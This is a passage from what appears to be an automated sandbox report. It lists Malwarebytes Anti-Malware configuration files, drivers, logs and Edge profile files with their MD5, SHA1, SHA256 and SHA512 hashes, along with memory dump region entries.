| SHA256 | 8ee64f89c48110b3aaebc0a7888affe99c47c9a73d9809096f18d3610c6cf735 |
| SHA512 | 27c8b7044f4ad968bf474bda7f7a463fe000356afac58900c3caa4821cbcc0bdd0007689ee894bee19b2005f2d787230ea1bd9e104eb4b59c5c16f1945ab70c3 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 98818ad302268e85323488150a944a3d |
| SHA1 | 72ab088d8a0090cd26a87c5023bb59b49f9bbc5c |
| SHA256 | 0b58bebc2d3011f4cbeda716a32b4854ac01ed12ca20367471304d6c6af99f4d |
| SHA512 | bb39ae3ba83470f9b9eb44a94dc978b1f6711407dc2aa6aab0a18690c22b1fa4f24c11a67fad59df5e9c82cbf24acd9a71372f59d788e31d675b6b8ebe9dd146 |
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json
| MD5 | fd513541f65da34aa3ca70c3c509c2dc |
| SHA1 | 960b181003b508137f74ae7059abefe4d40e0b82 |
| SHA256 | 9c77ce6e30e7fa396506d8191340a60862edd7f02e9716f8db01fd48af8e037b |
| SHA512 | a4c278e7c26fc8ce3d6d24272407c09b5a97c3782ee6feeface9d33927526e40c817fa2999f9b39f67b2127f6448ec03e8862014549f8258b2c0ca19e6dc0131 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | da969e4d05446367e33a232ce0f89727 |
| SHA1 | 7ceef168401276347429474a7a7cd0a77b17f9ca |
| SHA256 | 766d7fea3f88abfe82feec3c36eb6725def811dc38945897b3ac0fefe6c045ab |
| SHA512 | 9e97f7ee2f745afb916b24b6d3e5d942176479a801c7997beac14e010bdb526f3c6fa250f9bca63dae2080b598cd494b54c13a041e86149775e1e2ea7cac09a4 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.sys
| MD5 | 4b2cc2d3ebf42659ea5e6e63584e1b76 |
| SHA1 | 0042da8151f2e10a31ecceb60795eb428316e820 |
| SHA256 | 3db4366ccb9d94062388000926c060e2524c7d3ee4b6b7c7cf06f909f747fc6c |
| SHA512 | 804d64d346b3dbb1ce3095a5d0fa7acc5da0bf832c458e557dac486559fe53144f15f08c444fea84a01471fd5981e68801a809b143c56b5b63e3e16de9db0d98 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.inf
| MD5 | d87c2f68057611e687bdb8cc6ebea5b8 |
| SHA1 | 27b1311d3b199e4c22772fa1b7ea556805775d37 |
| SHA256 | ff93773f55bf4a6a0242adf82276a8c95c0b244b9bc05e515c4e810c81a960e8 |
| SHA512 | 4aa65b8911d8a2a0f9ef0ee6e934b94db0a9ad4c2ec543b5edcf21486be43f6ab1fda6617ea2cbb85eff230628c9fa8e7649da915d6de695803b28e55bef5819 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.cat
| MD5 | f7c8e0339bd48b6fe8eca81ac3ba5ba5 |
| SHA1 | 1369bd4dcfa7709d8eed12fa76fdbebd39dd6bcc |
| SHA256 | a9dd01f84a075ea8d0b0968fd7a11720e49f019834f7d4fe80f50dacb12030aa |
| SHA512 | c722510c40fbed32bcda3b5b69c590a9043e4e51f8e804f77f73eb8ea0cac0f4a587ef540f2773981839f04e44f48bbc8b5e8c03ded3f0cf637ed1e3172c8e07 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 057901586f52683f340559f3977dddf1 |
| SHA1 | 97884e4b2b3f138e42124b42bfec87c01634bef9 |
| SHA256 | 7c325b30c2a41e1f0c541a308b31c908033a25323effb70f2be62db77dbf89d6 |
| SHA512 | 12dc28d5d2cb88679afc13167ac510b26e1f96e884bc9b541b1d4d090c92c6be9f8f20fa3d7d85afcb3f282734b02d210a636a134cabf6acea941d96ad90c23d |
C:\Windows\System32\catroot2\dberr.txt
| MD5 | eaddcf96c810ea226a32b7fb36bb6fb4 |
| SHA1 | 455ff3ce11ad0bd33e6355082318a47cd1fe4491 |
| SHA256 | 00180c7bbe7353420dab34cfe8505caab038cd21f8a7f9ce466922d82594224d |
| SHA512 | 2121a0d09e5f45f8ebf66c0f64153810a6e950c268dd51055b94cd7ffa5a5529ed1119cbb3120d69ef22925d224d7ffc0c53750c67608098b09fb04882ef614e |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json.bak
| MD5 | fcf61612b808a58037997316cc065338 |
| SHA1 | e4caa5d9e894c726adb9f55c6578b3d176a7e3b4 |
| SHA256 | 3f34ccf30f3e0b5c7d2c4748dbe297bdcd526ed553589eb5f7ed25c1a471dd92 |
| SHA512 | 24617443e84b8ceb77a1e1325ef83f2fa1f5076aa968acdb20589c9ca27fedbdf139bff2fc898124aafbfbb03c74780ea42f3a85c5bba696f0dddb29c19a3b0d |
C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json
| MD5 | 7abedd6f23bde8a73ad019cdc9cb9f6e |
| SHA1 | 236b8dd7ba040b0e0e72426fcee34f796d02b3a8 |
| SHA256 | a1242fd8efa0ac312bf4551a4accf32c0b777ca71ca99ec70067bd16e2d4711a |
| SHA512 | ab02bb89dd5dfa2a1015a1b4bfb2bb6a94855abb85207700fb98378ff4f091e1271b669305c325275604d1332bc3ccc96550ff0e42812250ce4b67febcd4e556 |
C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json
| MD5 | f2bb357f0a2f85cb08913d92b548f384 |
| SHA1 | 673c29e7ea9597b2e209ca0c47468ba36f2688a3 |
| SHA256 | 45133f91f7a5eab0aef2b44ac0ff4077b2877abba13a58fe6a99352d788135e1 |
| SHA512 | a965c22442dd4e64f9b596f66a3742d69fd23735721216ebed5c04f18ac0dd7b3a7744bc41ac494f4db64dac96e8789aef60e5d9d23763327b0b16f171558e6a |
C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json
| MD5 | 5520a658279871c037085fde659fdd58 |
| SHA1 | 7d4d88aa15a9c3d8f05feac355b9cd57d19eee3b |
| SHA256 | bbcac26c07e225254b5a3687afa477f4311d638a83ea1fa10206923c2a7141f2 |
| SHA512 | c8d2e703abed6d8eb29a44766f678d3ef9fdf232d7d0483840b8414b19a388aca8a5735f2b62cdc447016ed4e706d59df5572f18784689356455773e9afe51af |
C:\ProgramData\Malwarebytes\MBAMService\config\ArwControllerConfig.json
| MD5 | 4832ef961de98d57d5d814604c51e727 |
| SHA1 | fe7e2a2a555dfc7d139d4a33ca73dbe7a6b81bee |
| SHA256 | 21d5eb62dc430931106dcd0ee7caa71895f3c58ebe517a38cd6fd296764146cf |
| SHA512 | 25da82fb5aa0b7a567a6c6f0b21d2b6b5567198ac29c09549dea6d9a769ce2eb541aa4f2d78268fea8b0bb2c926a3f5f9f92a8125c1c6b0ebbfcb4eb17167097 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | 8388cf3a27942cb0cb10a381b30b942b |
| SHA1 | 5a6b88780086c82809100cdfa034cd946e808703 |
| SHA256 | 3d5557f33c4ceeca73b920a2bc5f8b07a1d49834a363ebdaa06b39896dc501c6 |
| SHA512 | 5830bb0ad2602e939807007bfa588348853e3452ca5ad23a09fe3e6ad43efbf69a21ce865e2c219679f9184565c8c21fba5cbe948ee1f587499ee8ccdffaa9e5 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | d3069befddb7de5d91333affc0eb813c |
| SHA1 | 8a3f4c7fd00bf36159c22574f147e813c149cc8f |
| SHA256 | 5141836a5b5a77d326b474a9c2e8ca2f050c7151ac8df9d62f68408dd0fd7a64 |
| SHA512 | 4d17078768f095840029d1d9e05ecac530606e1c2ccc4889234b6f3da19551634580432b6cb307324c78e17782a8d1ff39ec6be661cc0260230a6d15f0160984 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | 67b6136cde50086a04d24421f905c7c0 |
| SHA1 | 725bde30fd42a263b6f29e2974807243af7ea900 |
| SHA256 | 3661c9fce9b75c15ac73b8863810da1169aa692465a1d214176eae4594ac3631 |
| SHA512 | db0cb7f3ecec7e01f21be7357fc72732f5404a69b0c374602188a7fee4b9f1b0631bd2ff96d61b703dd36807491b61ba3b57f4957b80b4db62ca4e17fc5dc5d7 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | a3e07b3c62826b7fb6cdf62a37220db6 |
| SHA1 | 180fdb6d1ce6da6f872445beeba8c7959016bbc1 |
| SHA256 | 52488ef7a49a0430cef8bb7c42f249fef75ac333f4f888b1ec17907cbf29d52a |
| SHA512 | 182041d71f3935096bac61023c44d9f570bde6dc1d6f45f63467788874e1f589a79c5f1f709594af93c92eb5cc80af2afd4e2b46397481e290e6966f3bfd01b0 |
C:\ProgramData\Malwarebytes\MBAMService\config\SpConfigFile.json
| MD5 | daae378616bacaa8c1855957c08a87ea |
| SHA1 | 7d30bbb4f58be184545fcacc7214974a7df0a5f0 |
| SHA256 | 3585d7786045afb99043057a8d6279ee4718076c1598d117232d345364a2adf4 |
| SHA512 | 5cab7edeae8a24672e72a291d0add8cd74e3f19289240ba51a0ee9fd91b64c1ac5413806c5d788e1390fcf6d0003949aeb7cc3fd4278a938a1b7ca43dd5f51e7 |
C:\ProgramData\Malwarebytes\MBAMService\config\VPNControllerConfig.json
| MD5 | eb7cf93c507d6f68236d84eeb9c46953 |
| SHA1 | dbb060748a4b634abef5cde1af0afffe072e8ce6 |
| SHA256 | bd09c4828d3d8c481d76aa339f872b1ed4d5c1791d568d1fac56bea5735a4a2e |
| SHA512 | ce134457ed044ca6593d3568fc31d0139707e18df41a28d63118e555a941155dccfa91060d07a11fa38755820a0fd490835da12e5ddf49608d66c6d4c1068160 |
C:\ProgramData\Malwarebytes\MBAMService\config\VPNServerListConfig.json
| MD5 | bfd69999934883b90472b2351f22ba1d |
| SHA1 | a98957b56eaf486c5be872b6388701741fbde0b2 |
| SHA256 | ac9a791979014e1e3f3691a9e20d22bcfe176b03ef83b97ac6ece22ae3a8a95b |
| SHA512 | 0c0df46b881848da1b50af16c6e69cc7131d02977d6bd6e66b50beab1a064975a19dccef8c8cd14669071e48eba3e2e80908810fa034545869bf2053a9168d45 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | f58fb08e8d0ba0c66f8f0057d319fb9f |
| SHA1 | bce8d6f90de94695eb177a30e64609c8d3331475 |
| SHA256 | 810bafda2c32e4225232ec554a7a8befe2d6c11c8c5306228f63f4a513e3d7cf |
| SHA512 | 7b3bc040101c9850455489f23394746da06631ee3a98679f706c7c59717e040de6411f8bbe5ed302aa226482188cdeff330d059881e65d1777485535412902c3 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
| MD5 | b4578d2d1f4cf227aa8df76fdb670b13 |
| SHA1 | ba391ff1ac391076dce56771ad9327353a5bc47c |
| SHA256 | ecaa4548c688372ff94e81a3e127600bab1c3324804cc1b1f23f19d82614956e |
| SHA512 | 3f981ba4d45adccc44f97de25d5baa548ff5a1ec552a0df519d77490e2762bcb288f88ab03b0d0df8d67af72513cd2c22994ae1af6e200a3db7884491f72ff78 |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json
| MD5 | 937c010f963bfb4baf574d92744c54d2 |
| SHA1 | 8a7ae22e8d4b9f75f682e6467a0f908e5a4ee1ee |
| SHA256 | 3301644e7cca4ca88ef5135d608e68d6228688e70ab18faa7d9b0d2384c491ff |
| SHA512 | 8328801a56e7334522c88799e12cc41b2382c67ac7189ef122135445904fd9e538fad636449730876d2653c2002f8c6ef64869b5dd472f93dd3438243f415fc6 |
C:\ProgramData\Malwarebytes\MBAMService\config\VPNControllerConfig.json
| MD5 | ebf74016e7633484fc7e2db62ec3e1de |
| SHA1 | 161daf6f6696acffbd4183b213f5c0e51947249d |
| SHA256 | 2e1182c14194902f59b46cb4151174ec5f431d67aa1b0ab1bc9f3b776607da6c |
| SHA512 | 695c3da68d3879afef31c9b86d7e1584980fb513740ea247f373330005d59cda38fb2d3f149ae8c40a183b1b0d22d0c0177f50ba7874d920ef9943529ad3f5dd |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | 7883277ea01b8dff7a65698bd3cc3d64 |
| SHA1 | 6035588f7d3fb40be941c45e714dc5750f4061f7 |
| SHA256 | f615b13be9622b685b57f975f7454d428635e625ca2cf88fb0f613e03573f894 |
| SHA512 | 6e1864703ac1e6f291726fef4b01542552f19a37d21f5b7341b1e9fb9ff59d7fb6ad783111db6f1f1c509a51df77133f5a434d50ceead46819073f67a44c0cc5 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 73d0852eef3c5bd4a73d857e8dd88bf6 |
| SHA1 | 07ccb7b33fbbbab10a55f118b0fda343daccf2b7 |
| SHA256 | 1ae9235edb3b8d229c2cfc15accd7d36185f95db97214b1a9259999396e23ec0 |
| SHA512 | 48186dc83147dc5003e4d309efa6e8b26fe68e71c1b9b3d3c717f8dce50817f95631dc373a39ddac8fae2403ad698c357cc84aa7f1ad2330bd4b07657db1e6e2 |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | 255ac6ba1ba5c170f9cb431474f80e1e |
| SHA1 | f4ad2222fb0a1e5f473bf53ac633a83b41f4133d |
| SHA256 | c6e1e486a2d90e44f49751824473dae4f4cbbcc079daa6683b0571a68dff9e48 |
| SHA512 | 2c6180c5f77db589a8944eaf775dd51a891404767360966628e09fc3bbc9c94fa0d6f592c0fb32b38cc1610c176a9d13623c90e3916da4261b43e3ae796aeb7a |
C:\Program Files\Malwarebytes\Anti-Malware\mb5uns.exe
| MD5 | eaac9032a5151ea0d7b74ae4bab32b35 |
| SHA1 | f2c1f886868f6b9f78aeda8cf95df5051239c1ef |
| SHA256 | 807379fdd7315c29bc1e96ed224285ac5ae0226bdfa5318642eaed6bb0ca3191 |
| SHA512 | 91fc6c387ee270372c401aa27aa399c5f6091dbcf1e94058c88e5edb473a7876c9de632cff5a4d6479a2a9bdcfb499c8ac6cdd3bd954b04db89685ccde0661db |
memory/1708-5959-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
memory/800-5961-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json
| MD5 | 70d9d1c7201e145419598a1983b5428d |
| SHA1 | 034698a9057d33e155d680eaa07a5891cfd09e1f |
| SHA256 | 3ee3e3934708902161f1b174e4da39f67b4ae5ed528ed529166ff2d2d3afb08c |
| SHA512 | 6207eb5cf218c38a32094cf204b2a14567fbc41dec225aa71d0ad567f590103524d2f62ef49d14f211813948f1ebe165476b7ac4557031106726474d8de22ddb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 254f7da80b380f61604b94b42ec1fbc7 |
| SHA1 | b414e7bc6b05564c5c97b89658bb6a5d8dcb6656 |
| SHA256 | f849cfcda0297841baeee673436302138a63d76a5dd5e7ee33b2b31645848804 |
| SHA512 | d8369e634402c770c256cf02cdb22c73ffe478fe823db5d2eb9df755f5ea9be2a82a94d09865da557d490c13b8304bdf9e040a1537d78c2d28c7e5e222c05863 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd96d72eb6f66aedddaa56f09a4d350a |
| SHA1 | ee1ce0d79b28855ab7808c6fa422433ac4317415 |
| SHA256 | 43ace5a374f9b11980fe361400dc585374520cdb2241f570959952786101764e |
| SHA512 | 598e5963a202cb9bdeccf343eabd9172f559e44a3adf5efcdfe37988baa965f4c141eaa45c4c25952e65aa8e33a7398c1d647a4829508f3aa1e12072e3903254 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b5cf454386614855bdcd46577c16773c |
| SHA1 | 0b1a6559d70c352797aa3a954f5ab37f2e58e627 |
| SHA256 | 0e3284710281fd0f5d473f6f2e08e37b3422955c86df68bf8e74813a07ea052a |
| SHA512 | 9f34c34b3123f7276dfa00f2739a4776bc21c18d70c8b2609b7aaa1049de58fbb870efc798d862360fde6d4175b03044b5574ba6252ec3d36a2eeed024e4124d |
memory/1708-6107-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
memory/800-6111-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp
memory/3896-6115-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp
memory/5196-6116-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp
memory/3896-6117-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp
memory/5196-6120-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json.bak
| MD5 | 9228a5cc0292261b155564141effedcc |
| SHA1 | 86c7182a317b96bcaaad42dd0e7eda692a39af73 |
| SHA256 | 5d32eca478274446881cab62c05512e12cf45d42379c44231d434a626b7b13fb |
| SHA512 | 8b4aa0a85ce0846980d71ac8ac5de4fead0ad315ecfd3094a74339ad3b3d2af1cc6da998b7e065dec70dea3455ea45bb0a5cff7e80590ac35e0c70e397b99be0 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 8497cca85293564954a9049fae4a2ee0 |
| SHA1 | 2332ce0133ed24f2cb8cb4fe876f50fde690c03d |
| SHA256 | ecbfaa447c94ef30882b566925986d8c2c2eac5333f47a1da6e10b880cf1807b |
| SHA512 | e1f37431158bc8c70da6ce2a42a9ec50d965b4523eadeddb46f23ca9a611edb2008c94f56d2d553201b5c22dad219df4f085308ab487f1e79f6ad631bb25ffce |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 8ca15860e4fc123b2d9196aac5a73a59 |
| SHA1 | 97bbc5ddf642ce7ca4f0a2baf9f8411953338818 |
| SHA256 | c525a6af40068b1e021a41656a1dac73e939d8dae8eadbf63c686115163dc9e0 |
| SHA512 | 1a7a8f22f26ad61a488b630b7b62fc65cbd0b0ba1c558e23425e5815bf63632a7fb5dd3c79f1a6998328179f725f64bc775ad4f57935d6a9c845ea31a858b98b |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.inf
| MD5 | 5a9717e1385703e8f06b27aa10a69e87 |
| SHA1 | 84ee67a9167b5eb6560711b9871de98898ad07a5 |
| SHA256 | 47b7c516bb57c612de19f0ca865590af95b6e32bf873a0fef9e011b2c5b483d4 |
| SHA512 | dd3c7278c2c11ad15a55fae6d19b96dadd92f85b7f0c8ce934298258af00bb5c052a84a98499b8867b0f43704fb307c67d03692ca69dda4d814c6c17dd73df44 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.sys
| MD5 | 262ccb223392f18adb4b4c846905c4da |
| SHA1 | 63403407fbe1712a4bfad0a74efabeba297325ca |
| SHA256 | 5d2004603e3b392693a1e74926a36a2ab3573c6790b00ddb14564c8affbd4f4f |
| SHA512 | 68b2684b9f0a2e5e33b76e43ac4b25b8e7d3dc3d678fc3c90d70ec5ee65ebdd884d838950fb4bc5145ff927e25796d2e6e97ee6bf365ed4f66ac7f7ba8f63b33 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | f4993b17b457e6a2ae76a65090bc2458 |
| SHA1 | 8de386dae6da6b000613715cf00bada61aed359d |
| SHA256 | ee85545f24ccbb04e6ec498fbaff7a6afc705a050648cde20c05da4abb990a36 |
| SHA512 | 81b8966a71ed707a89aa676a3588426d2a854cac55bd1dd8c81a070e1729e7efd5d0e6b27de58809a03c5809d47f3b955817565da69e666a8e1ae1f7458b1665 |
C:\ProgramData\Malwarebytes\MBAMService\config\SpConfigFile.json
| MD5 | b598b04018a6e5465e1cd08f91816ca0 |
| SHA1 | 74e99cf6c83474a95680664cc98f6353bc0c7104 |
| SHA256 | b07ca85735af9f4fa951f86dd7f60203607587fb2dbb86db502c21c34e49e7e9 |
| SHA512 | 8a85c2d5b6a1f9875132393d55bbde9e817a2ec336ec6954969798004eef84e4bd83083849eba52a814891bc0b448ae927ea73c083ebdc4bd675baeaa58604b8 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.sys
| MD5 | d738a028dcfb7d1cf97e9fb11e306db7 |
| SHA1 | 77f4d6a79e1f2754a2e93095158d0edfb9a6a5eb |
| SHA256 | 8f38d2a0a8e306de910bb621cab4276520aed84645de942538d0a9c792dd0074 |
| SHA512 | c753a13767c8460823851a144a2a9162168a1099664ba601d0a929d539ee15d78123ffd86cb6225f0d7e6f52f40b2c444705da8bcc1292bb6c9757732b82ad94 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.inf
| MD5 | 358bb9bf66f2e514310dc22e4e3a4dc5 |
| SHA1 | 87bfc1398e6756273eee909a0dfb4ef18b38d17c |
| SHA256 | ff51780a5a854b2c18f71ae426cb066a13723ef6155e24f4910137c9e8dfdc17 |
| SHA512 | 301ec5ec5c0813951843011f2204924240235494999136ea30a557cbf58146fc6043a8866b344fa7deb927d7c83d44e2aaf45adca7d221aba5d36715b9a63e09 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | 0798225d19c4c9608a3f560081b42c9d |
| SHA1 | a6ef8cd5be416c46b7db08294db95fc44bab5d21 |
| SHA256 | 8f2932adc90edb6c848dcc4ac55153188a48e07960898e95d2da6207fd363c37 |
| SHA512 | 97816c5d91799a688973c005528720d08266cf15051061667b2d7b94dc1ea2eaea9eab8856c94f497265ceeae5ebef262f5a8a11204609324397e4882edc9df8 |
C:\ProgramData\Malwarebytes\MBAMService\LOGS\mbae-default.log
| MD5 | 26f35c9fd6452b6ac21cec576f4b9889 |
| SHA1 | d30a2903859353ee4bb80aa53e932d80e8d845c5 |
| SHA256 | e4c57f19c34d251882db288c7b52df2d8f0a7244c41c22a85870886f84989f69 |
| SHA512 | e6e54c4ca779386fe246cae2eb9c115ddede3687b5c51a13c64c3526fb2d9542ae3cf6779d84dfd03ef7ca285981fcbda2ae02fdb37a8088da852280f4935041 |
memory/1708-6341-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.cat
| MD5 | 43af9deb38e2dbd69c46b6befdbddd6e |
| SHA1 | eb7a9e4cdd74f0cc5a1ee07292a561123cab2545 |
| SHA256 | ca94b3a3b8721870a0b96675649800bd751daadc0391cbf3143e2f7aae6dc676 |
| SHA512 | 9947529cab455151fc1ce09828ebf195de922b41a303c12f33baf5670729b533cadb28f360301f2a0ad14f3c7315ba90955a0bdcb7828ec1920b349fada2f518 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | d9fd77e6b6d7870c70083e88f07c9c61 |
| SHA1 | 11db2dfaec0f897d0e1d12a0871696f42a739a4a |
| SHA256 | 1bd87e406eae49bb104b58bd3c06888617ddad138ed3679909f7c76609c6d5d0 |
| SHA512 | 43e5f3c4016fd7e5d515fc0fc0f6d82f6710d734885d76455475c952c05c7aaa117c6fa75ee5f08ce2cdaacc63332803f3582aa9d52ce7faaff66548a2187198 |
C:\ProgramData\Malwarebytes\MBAMService\config\ArwControllerConfig.json
| MD5 | 19d419b81eaf346a4b8cb41d9bd14f65 |
| SHA1 | 785501c090a4876c1cf8f347b3c3188c9e4c1ae8 |
| SHA256 | d42c3b7af67332bc93a1d2a449f470216d95007321b5a388a7c0c7b9d704f211 |
| SHA512 | 7658d4c15fd5be73e1c3ce82a3111601bb0dc40ab36e5d3843b68cd88993d839c1038f7fd77c860afc059054ea692273f46443bc191563b641d1bc77417ce0a6 |
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.cat
| MD5 | 1cd8abdaea3bcd30214f01046ecd450d |
| SHA1 | abc8fef03a274dcb9f15c17396e9f0af85a0b0fd |
| SHA256 | cf981ad0b084c330fbfc00f9e559404c6731d407a9f004ce68b50ecd7abe7425 |
| SHA512 | a04f2beafbe2311a5eec84f8ecff16db1dda864d420643184b0164aca9958b679205c3ab23bb71095d710f45dc4c3c51ff8b267c36a1ffc768126b48556f5f86 |
C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json
| MD5 | 10fc64d39cc15810c7fa636880b5d3a1 |
| SHA1 | a0f15ade77cb50dd5335355eed68cbbb492c4fe5 |
| SHA256 | 1e84ec9e402a09d6adb55eb361b6244733eebf2996bd7bef3d517379e7d7bd91 |
| SHA512 | 307210d2df4c13187460c7710cb4a1959eac1cac1db237646a6b031e522be73aac76e5658156c53a68b5ac97641dbd7dbddc051ee8064c235cc6f8fa9944697d |
memory/1708-6451-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.tmf
| MD5 | 68ecb046a9069c74f09ad967d69f599f |
| SHA1 | 6d58724c81e333a2b0f9b573e10fd677922ecb4f |
| SHA256 | 4d0aeeb79a3dc56eb947f78d83869822459fa335daad98fbe0cac6d2e52dc8d3 |
| SHA512 | 86f1cd8172d600d34e8da12f3e367ca76a17995433f3a1b733213efffc7d73edc9277ea3c2eaf2f390d9d4cb933552216b5b206b1e4fadf2b64af4af250182e7 |
C:\ProgramData\Malwarebytes\MBAMService\ARW\mbarwind.arw
| MD5 | 31f4ed6c2077a6712cfc2b27762b580b |
| SHA1 | 57c68266fc9b49c5d7dc62a15eb6636befcbc84b |
| SHA256 | 1ca6574269eb2e6daa059cec58c5e999fc6345bb8a93a7b3e22fefd34a7ea8b3 |
| SHA512 | 13d9727a694c88fde149517beb4d16938f328486065b9d491151b06855312cd0b5deda67a2ee4ba85280d19d7d6b648bf0b6ffd3ed9cb346ba9ed0cfe9ceeed6 |
memory/1708-6613-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
C:\ProgramData\Malwarebytes\MBAMService\ARW\ARWFI.dat
| MD5 | 917802c75d01c9f5a2236df21c7d6afa |
| SHA1 | 1abd2e7309824b3272ba3afb0b5004d247d0995a |
| SHA256 | 085e656a56bf088cb0eaf7e4c5c27123682e519daab1a3459b689460c4bbabe8 |
| SHA512 | fdc5bdac5de8f5af8d25c4d5638a8bdc66ce2023aa9531ca15f1eb33721e552b601758e5a375999f687878fdcd2863a74ac300ec399ff3f7d939d49858095096 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | ddbafc63cbacf898ae3d2474ad40a6b7 |
| SHA1 | ad95dfdeb6d1fb755a135f5b7e181eed0435874c |
| SHA256 | 2799b50df8d841e8e197fac1ac9b9cb321aff2fc0fe9d5dc839e81786b2adc96 |
| SHA512 | a341665f57fdebfae326b949fb722188d0a48409bb5a038fbcc94e66da735c7dc95ab9ee39dff10a5cfcca11d259e7f32613bc8c00818cc02eddf40d12f0460b |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | c08264f32dd3992a585bdf01e8c4237b |
| SHA1 | 3f3696b0ac6dc59331ff3512a441a5418f85ca31 |
| SHA256 | d8baa43b2e10057185e1efe514cc3bad8a787e304df32f16e629ad9611889920 |
| SHA512 | 4dba224113cee3a36891cd48c99ac9bccac4cf9af9765dbb40a4bf285c086d452a36dfb33ab07268cccdd0bc8defc4118c46b571a3fb879bf68543cc6419a91c |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 810bf253336b4242f5f23e0e3a59ae99 |
| SHA1 | a644289e4b364ce549aead6a1ce456f34c85f010 |
| SHA256 | 6cf86669238bdebdbd2565498b1600bc660c3753bd077593ace268dc1cecaf18 |
| SHA512 | 6a617cca19c0908199ec27421312aea52b358545b4db3c2988dfd45aab1269db469c5e5887c9264c4c7f26aa4674c3c2ba0327af13748f17c56fd6539e208181 |
memory/1708-6773-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
memory/1708-6776-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | d9a7f09db91b75a811de1fdbd40b5a00 |
| SHA1 | d77247263e256270c3602348ccbcdfe03cb02e94 |
| SHA256 | b6e15f787fca8bd1310862fecdfb36eacdb6aba6b1987c6b3a5e2f5ea76b61d8 |
| SHA512 | f0ffe28a1b6837e0cd42ef587a450103544a5cd56019e124ae69107d6ba5536dcff73ea8f2949cd9edc342140a0f3d1b04d2494089e60736d5d2c6c1d9ded912 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 6b670d328f63b62f85eb9fdbd7373566 |
| SHA1 | a94acb37794b0ef260d101bccfc5aed4bdce3d52 |
| SHA256 | d8d05de9aae1d0591fd8b5e3eb0443f573fadcd6d9e488a5868822e8f0482e64 |
| SHA512 | a7f1591c6cd8e6efb6630eb01c5d26d0ede491d5d2dcf15bb4665016dd9a1495870135c71fbcce5e8bb0803723794b8a9864522df18413037c34babcd9cd2b07 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 31079b1feacb0e00d5069df0eeb4bf27 |
| SHA1 | 4d9c26b26e4f897583fb838cab27e9a4dd91e451 |
| SHA256 | de6f48e4d9bd6b72bda5ce3b7a481a8a51cf82a0bd759825d038d6e469e6aab9 |
| SHA512 | 6cb75d7e489f6e0b6b4dc6e53ad98b925dc1338bd16b9d57918f5777a48ac960870f8c32ce91c41dad2623a149409e25170e3d84fc5e3cf3274bea399c0ac00a |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 685845df19a7cad14901ec51ddeeedfd |
| SHA1 | 83b9c2051ede1c557a6aa1f1cc9f5b2d61380d36 |
